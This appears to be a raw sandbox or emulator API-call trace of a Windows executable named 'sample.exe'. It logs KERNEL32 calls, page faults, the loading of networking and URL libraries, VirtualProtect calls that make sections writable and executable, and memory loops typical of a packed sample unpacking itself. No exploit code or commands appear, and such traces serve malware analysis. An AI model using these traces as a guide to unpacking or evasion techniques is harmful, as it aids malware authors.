KERNEL32!SetCurrentDirectory ("C:\WINDOWS")
KERNEL32!WinExec ("c:\sample.exe",0x00000000)
KERNEL32!InternalExec ("c:\sample.exe",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000000 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070005
PageFault tbl process 0x00000100 - 0x0000001B entries, 0x00000000-0x00000000. fhandle=0x7200301F.
|offset 0x00400000, seek 0x00000000, size 0x00000200, flags=0x00000004
|offset 0x00401000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00402000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00403000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00404000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00405000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00406000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00407000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00408000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00409000, seek 0xFFFFFFFF, size 0x000001BA, flags=0x00000000
|offset 0x0040A000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040B000, seek 0xFFFFFFFF, size 0x00000052, flags=0x00000000
|offset 0x0040C000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040D000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040E000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0040F000, seek 0xFFFFFFFF, size 0x00000A00, flags=0x00000000
|offset 0x00410000, seek 0x00000200, size 0x00001000, flags=0x00000000
|offset 0x00411000, seek 0x00001200, size 0x00001000, flags=0x00000000
|offset 0x00412000, seek 0x00002200, size 0x00001000, flags=0x00000000
|offset 0x00413000, seek 0x00003200, size 0x00001000, flags=0x00000000
|offset 0x00414000, seek 0x00004200, size 0x00001000, flags=0x00000000
|offset 0x00415000, seek 0x00005200, size 0x00001000, flags=0x00000000
|offset 0x00416000, seek 0x00006200, size 0x00001000, flags=0x00000000
|offset 0x00417000, seek 0x00007200, size 0x00000E00, flags=0x00000000
|offset 0x00418000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x00419000, seek 0xFFFFFFFF, size 0x00001000, flags=0x00000000
|offset 0x0041A000, seek 0xFFFFFFFF, size 0x00000194, flags=0x00000008
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00000416
KERNEL32!LoadLibraryA ("KERNEL32.dll")
KERNEL32!GetModuleHandleA ("KERNEL32.dll")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803582 accessing page 0x00000410
KERNEL32!GetProcAddress (0x7C800000,"GetProcAddress")
KERNEL32!LoadLibraryA ("USER32.dll")
KERNEL32!GetModuleHandleA ("USER32.dll")
KERNEL32!LoadLibraryA ("ADVAPI32.dll")
KERNEL32!GetModuleHandleA ("ADVAPI32.dll")
KERNEL32!LoadLibraryA ("WS2_32.dll")
KERNEL32!GetModuleHandleA ("WS2_32.dll")
KERNEL32!strcpy (0x04FFFC22,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","WS2_32.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\WS2_32.dll",0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072004
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\WS2_32.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070006
PageFault tbl process 0x00000000 - 0x00000008 entries, 0x00000000-0x00000000. fhandle=0x72003410.
|offset 0x733B0000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x733B1000, seek 0x00000800, size 0x00001000, flags=0x00000000
|offset 0x733B2000, seek 0x00001800, size 0x00001000, flags=0x00000000
|offset 0x733B3000, seek 0x00002800, size 0x00000C00, flags=0x00000000
|offset 0x733B4000, seek 0x00003400, size 0x00000400, flags=0x00000000
|offset 0x733B5000, seek 0x00003800, size 0x00000400, flags=0x00000000
|offset 0x733B6000, seek 0x00003C00, size 0x00001000, flags=0x00000000
|offset 0x733B7000, seek 0x00004C00, size 0x00000400, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x000733B5
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"Sleep")
KERNEL32!GetProcAddress (0x7C800000,"ExitThread")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!LoadLibraryA ("ipstack.dll")
KERNEL32!GetModuleHandleA ("ipstack.dll")
KERNEL32!strcpy (0x04FFF9E2,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","ipstack.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\ipstack.dll",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\ipstack.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070007
PageFault tbl process 0x00000000 - 0x0000000B entries, 0x00000000-0x00000000. fhandle=0x72003DF4.
|offset 0x73350000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x73351000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x73352000, seek 0x00001600, size 0x00001000, flags=0x00000000
|offset 0x73353000, seek 0x00002600, size 0x00000A00, flags=0x00000000
|offset 0x73354000, seek 0x00003000, size 0x00001000, flags=0x00000000
|offset 0x73355000, seek 0x00004000, size 0x00001000, flags=0x00000000
|offset 0x73356000, seek 0x00005000, size 0x00001000, flags=0x00000000
|offset 0x73357000, seek 0x00006000, size 0x00001000, flags=0x00000000
|offset 0x73358000, seek 0x00007000, size 0x00000A00, flags=0x00000000
|offset 0x73359000, seek 0x00007A00, size 0x00000200, flags=0x00000000
|offset 0x7335A000, seek 0x00007C00, size 0x00000200, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00073359
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"GetFileAttributesA")
KERNEL32!GetProcAddress (0x7C800000,"ReadFile")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
KERNEL32!GetProcAddress (0x7C800000,"EnterCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"LeaveCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"ExitThread")
KERNEL32!GetProcAddress (0x7C800000,"GetFileSize")
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00073350
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x0007335A
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x00073352
KERNEL32!GetProcAddress (0x73350000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetProcAddress (0x73350000,"ip_gethostname")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00073351
KERNEL32!GetProcAddress (0x73350000,"ip_gethostbyname")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x00073353
KERNEL32!GetProcAddress (0x73350000,"ip_receive_data")
KERNEL32!GetProcAddress (0x73350000,"ip_transfer_data")
KERNEL32!GetProcAddress (0x73350000,"ip_getservbyname")
KERNEL32!GetProcAddress (0x73350000,"ip_retrieve_socket_data")
KERNEL32!GetProcAddress (0x73350000,"ip_connect")
KERNEL32!GetProcAddress (0x73350000,"ip_listen_port")
KERNEL32!GetProcAddress (0x73350000,"ip_bind_port")
KERNEL32!GetProcAddress (0x73350000,"ip_close")
KERNEL32!GetProcAddress (0x73350000,"ip_allocate_socket")
KERNEL32!GetProcAddress (0x73350000,"ip_query_protocol")
KERNEL32!GetProcAddress (0x73350000,"ip_reverse_dns")
KERNEL32!GetProcAddress (0x73350000,"ip_release_socket")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073001
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x000733B0
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x000733B6
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x000733B3
KERNEL32!GetProcAddress (0x733B0000,"CPlApplet")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802ECC accessing page 0x000733B7
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!LoadLibraryA ("RASAPI32.dll")
KERNEL32!GetModuleHandleA ("RASAPI32.dll")
KERNEL32!strcpy (0x04FFFC22,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","RASAPI32.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\RASAPI32.dll",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\RASAPI32.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070008
PageFault tbl process 0x00000000 - 0x00000005 entries, 0x00000000-0x00000000. fhandle=0x720041BB.
|offset 0x76ED0000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x76ED1000, seek 0x00000600, size 0x00000A00, flags=0x00000000
|offset 0x76ED2000, seek 0x00001000, size 0x00000200, flags=0x00000000
|offset 0x76ED3000, seek 0x00001200, size 0x00000200, flags=0x00000000
|offset 0x76ED4000, seek 0x00001400, size 0x00000400, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00076ED3
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00076ED0
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x00076ED4
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x00076ED1
KERNEL32!GetProcAddress (0x76ED0000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!LoadLibraryA ("urlmon.dll")
KERNEL32!GetModuleHandleA ("urlmon.dll")
KERNEL32!strcpy (0x04FFFC22,"C:\WINDOWS\SYSTEM32")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32","\")
KERNEL32!lstrcat ("C:\WINDOWS\SYSTEM32\","urlmon.dll")
KERNEL32!_lopen ("C:\WINDOWS\SYSTEM32\urlmon.dll",0x00000000)
KERNEL32!GetFileSize (0x00000020,0x00000000)
KERNEL32!_lclose (0x00000020)
KERNEL32!CloseHandle (0x00000020)
KERNEL32!InternalExec ("C:\WINDOWS\SYSTEM32\urlmon.dll",0x00000000,0x00000000)
KERNEL32!EnterCriticalSection (0x00000000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072005
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC00084E2 accessing page 0x00070009
PageFault tbl process 0x00000000 - 0x00000007 entries, 0x00000000-0x00000000. fhandle=0x72004244.
|offset 0x77250000, seek 0x00000000, size 0x00000400, flags=0x00000004
|offset 0x77251000, seek 0x00000600, size 0x00001000, flags=0x00000000
|offset 0x77252000, seek 0x00001600, size 0x00000C00, flags=0x00000000
|offset 0x77253000, seek 0x00002200, size 0x00001000, flags=0x00000000
|offset 0x77254000, seek 0x00003200, size 0x00000200, flags=0x00000000
|offset 0x77255000, seek 0x00003400, size 0x00000200, flags=0x00000000
|offset 0x77256000, seek 0x00003600, size 0x00000A00, flags=0x00000008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C8034F3 accessing page 0x00077255
KERNEL32!LoadLibraryA ("user32.dll")
KERNEL32!GetModuleHandleA ("user32.dll")
KERNEL32!GetProcAddress (0x77D30000,"wsprintfA")
KERNEL32!LoadLibraryA ("kernel32.dll")
KERNEL32!GetModuleHandleA ("kernel32.dll")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00077250
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803023 accessing page 0x00077256
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C803416 accessing page 0x00077252
KERNEL32!GetProcAddress (0x77250000,"CPlApplet")
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!HeapAlloc (0x00000000,0x00000008,0x0000031C)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802FEA accessing page 0x00000400
KERNEL32!CreateThread (0x00000000,0x00000000,0x0041000C,0x7C8010C3,0x00000000,0x04FFFE16)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FFD0
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetModuleHandleA ("KERNEL32")
KERNEL32!GetProcAddress (0x7C800000,"VirtualProtect")
KERNEL32!VirtualProtect (0x00400138,0x000000A0,0x00000040,0x4FFD0BD4)
KERNEL32!VirtualProtect (0x00401000,0x000081BA,0x00000040,0x4FFD0BD4)
KERNEL32!VirtualProtect (0x0040A000,0x00001052,0x00000040,0x4FFD0BD4)
KERNEL32!VirtualProtect (0x0040C000,0x00003A00,0x00000040,0x4FFD0BD4)
KERNEL32!VirtualProtect (0x00410000,0x0000A194,0x00000040,0x4FFD0BD4)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00410223 accessing page 0x00000417
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00410223 accessing page 0x00000418
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x0041020F accessing page 0x00000419
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!GetModuleHandleA ("KERNEL32")
KERNEL32!GetProcAddress (0x7C800000,"LocalAlloc")
KERNEL32!GetProcAddress (0x7C800000,"LocalFree")
KERNEL32!GetProcAddress (0x7C800000,"RtlMoveMemory")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C80A
KERNEL32!GetProcAddress (0x7C800000,"RtlZeroMemory")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x00419681 accessing page 0x0000041A
KERNEL32!LocalAlloc (0x00000040,0x00000480)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073002
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!RtlZeroMemory (0x4FFD0B00,0x00000040)
KERNEL32!RtlZeroMemory (0x4FFD0B00,0x00000040)
KERNEL32!LocalFree (0x730020D4)
KERNEL32!LocalFree (0x73001C4C)
KERNEL32!LocalAlloc (0x00000040,0x00001680)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073003
KERNEL32!LocalAlloc (0x00000040,0x00008000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007300B
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073004
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073005
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073006
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073007
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073008
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073009
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007300A
KERNEL32!LocalAlloc (0x00000040,0x000004D8)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007300C
KERNEL32!LocalAlloc (0x00000040,0x0000004C)
KERNEL32!RtlZeroMemory (0x4FFD0ADC,0x00000040)
KERNEL32!LocalFree (0x7300C0CC)
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!LocalFree (0x7300C120)
KERNEL32!LocalFree (0x7300BBEC)
KERNEL32!LocalAlloc (0x00000040,0x0000001A)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004193C3 accessing page 0x00000411
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004193C3 accessing page 0x00000412
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004193C3 accessing page 0x00000413
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004193C3 accessing page 0x00000414
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x004193C3 accessing page 0x00000415
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000401
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000402
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000403
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000404
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000405
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000406
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000407
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000408
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x00000409
KERNEL32!LocalFree (0x7300C5A8)
KERNEL32!LocalFree (0x73003BE4)
KERNEL32!LocalFree (0x7300255C)
KERNEL32!LocalAlloc (0x00000040,0x00001680)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007300D
KERNEL32!LocalAlloc (0x00000040,0x00008000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073015
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007300E
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007300F
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073010
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073011
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073012
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073013
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073014
KERNEL32!LocalAlloc (0x00000040,0x000004D8)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073016
KERNEL32!LocalAlloc (0x00000040,0x0000004C)
KERNEL32!RtlZeroMemory (0x4FFD0ADC,0x00000040)
KERNEL32!LocalFree (0x7301613A)
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!LocalFree (0x7301618E)
KERNEL32!LocalFree (0x73015C5A)
KERNEL32!LocalAlloc (0x00000040,0x0000001A)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x0000040A
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x0000040B
KERNEL32!LocalFree (0x73016616)
KERNEL32!LocalFree (0x7300DC52)
KERNEL32!LocalFree (0x7300C5CA)
KERNEL32!LocalAlloc (0x00000040,0x00001680)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073017
KERNEL32!LocalAlloc (0x00000040,0x00008000)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x0007301F
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073018
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x00073019
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007301A
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007301B
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007301C
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007301D
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8D0 accessing page 0x0007301E
KERNEL32!LocalAlloc (0x00000040,0x000004E0)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80D8AF accessing page 0x00073020
KERNEL32!LocalAlloc (0x00000040,0x0000004C)
KERNEL32!RtlZeroMemory (0x4FFD0ADC,0x00000040)
KERNEL32!LocalFree (0x730201B0)
KERNEL32!LocalAlloc (0x00000040,0x00000480)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!RtlZeroMemory (0x4FFD0AA8,0x00000040)
KERNEL32!LocalFree (0x73020204)
KERNEL32!LocalFree (0x7301FCC8)
KERNEL32!LocalAlloc (0x00000040,0x0000001A)
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x0000040C
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x0000040D
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C80AC34 accessing page 0x0000040E
KERNEL32!LocalFree (0x7302068C)
KERNEL32!LocalFree (0x73017CC0)
KERNEL32!LocalFree (0x73016638)
KERNEL32!GetModuleHandleA ("KERNEL32.dll")
KERNEL32!GetProcAddress (0x7C800000,"CreateProcessA")
KERNEL32!GetProcAddress (0x7C800000,"WriteFile")
KERNEL32!GetProcAddress (0x7C800000,"lstrlenA")
KERNEL32!GetProcAddress (0x7C800000,"lstrcpyA")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleFileNameA")
KERNEL32!GetProcAddress (0x7C800000,"CreateFileA")
KERNEL32!GetProcAddress (0x7C800000,"GetTempPathA")
KERNEL32!GetProcAddress (0x7C800000,"DeleteFileA")
KERNEL32!GetProcAddress (0x7C800000,"SetThreadPriority")
KERNEL32!GetProcAddress (0x7C800000,"CloseHandle")
KERNEL32!GetProcAddress (0x7C800000,"HeapAlloc")
KERNEL32!GetProcAddress (0x7C800000,"GetProcessHeap")
KERNEL32!GetProcAddress (0x7C800000,"GetSystemTime")
KERNEL32!GetProcAddress (0x7C800000,"MultiByteToWideChar")
KERNEL32!GetProcAddress (0x7C800000,"SetPriorityClass")
KERNEL32!GetProcAddress (0x7C800000,"GetCurrentThread")
KERNEL32!GetProcAddress (0x7C800000,"GetCurrentProcess")
KERNEL32!GetProcAddress (0x7C800000,"Sleep")
KERNEL32!GetProcAddress (0x7C800000,"HeapFree")
KERNEL32!GetProcAddress (0x7C800000,"GetFileAttributesA")
KERNEL32!GetProcAddress (0x7C800000,"GetModuleHandleA")
KERNEL32!GetProcAddress (0x7C800000,"SetUnhandledExceptionFilter")
KERNEL32!GetProcAddress (0x7C800000,"GetStartupInfoA")
KERNEL32!GetProcAddress (0x7C800000,"InterlockedDecrement")
**PAGE FAULT: process 0x00000100 - cs:eip 0x002B:0x7C802EF2 accessing page 0x0007C80B
KERNEL32!GetProcAddress (0x7C800000,"SetEnvironmentVariableA")
KERNEL32!GetProcAddress (0x7C800000,"CompareStringW")
KERNEL32!GetProcAddress (0x7C800000,"CompareStringA")
KERNEL32!GetProcAddress (0x7C800000,"FlushFileBuffers")
KERNEL32!GetProcAddress (0x7C800000,"LoadLibraryA")
KERNEL32!GetProcAddress (0x7C800000,"GetProcAddress")
KERNEL32!GetProcAddress (0x7C800000,"LeaveCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"InterlockedIncrement")
KERNEL32!GetProcAddress (0x7C800000,"LCMapStringW")
KERNEL32!GetProcAddress (0x7C800000,"LCMapStringA")
KERNEL32!GetProcAddress (0x7C800000,"GetEnvironmentStringsW")
KERNEL32!GetProcAddress (0x7C800000,"GetEnvironmentStrings")
KERNEL32!GetProcAddress (0x7C800000,"WideCharToMultiByte")
KERNEL32!GetProcAddress (0x7C800000,"FreeEnvironmentStringsW")
KERNEL32!GetProcAddress (0x7C800000,"FreeEnvironmentStringsA")
KERNEL32!GetProcAddress (0x7C800000,"IsBadCodePtr")
KERNEL32!GetProcAddress (0x7C800000,"IsBadReadPtr")
KERNEL32!GetProcAddress (0x7C800000,"GetTimeZoneInformation")
KERNEL32!GetProcAddress (0x7C800000,"GetLocalTime")
KERNEL32!GetProcAddress (0x7C800000,"GetLastError")
KERNEL32!GetProcAddress (0x7C800000,"SetFileAttributesA")
KERNEL32!GetProcAddress (0x7C800000,"ResumeThread")
KERNEL32!GetProcAddress (0x7C800000,"ReadFile")
KERNEL32!GetProcAddress (0x7C800000,"GetFileType")
KERNEL32!GetProcAddress (0x7C800000,"RtlUnwind")
KERNEL32!GetProcAddress (0x7C800000,"ExitProcess")
KERNEL32!GetProcAddress (0x7C800000,"TerminateProcess")
KERNEL32!GetProcAddress (0x7C800000,"GetStringTypeW")
KERNEL32!GetProcAddress (0x7C800000,"GetStringTypeA")
KERNEL32!GetProcAddress (0x7C800000,"GetCommandLineA")
KERNEL32!GetProcAddress (0x7C800000,"GetVersion")
KERNEL32!GetProcAddress (0x7C800000,"InitializeCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"DeleteCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"EnterCriticalSection")
KERNEL32!GetProcAddress (0x7C800000,"UnhandledExceptionFilter")
KERNEL32!GetProcAddress (0x7C800000,"SetStdHandle")
KERNEL32!GetProcAddress (0x7C800000,"GetCPInfo")
KERNEL32!GetProcAddress (0x7C800000,"GetACP")
KERNEL32!GetProcAddress (0x7C800000,"GetOEMCP")
KERNEL32!GetProcAddress (0x7C800000,"GetCurrentThreadId")
KERNEL32!GetProcAddress (0x7C800000,"TlsSetValue")
KERNEL32!GetProcAddress (0x7C800000,"TlsAlloc")
KERNEL32!GetProcAddress (0x7C800000,"SetLastError")
KERNEL32!GetProcAddress (0x7C800000,"TlsGetValue")
KERNEL32!GetProcAddress (0x7C800000,"HeapDestroy")
KERNEL32!GetProcAddress (0x7C800000,"SetHandleCount")
KERNEL32!GetProcAddress (0x7C800000,"GetStdHandle")
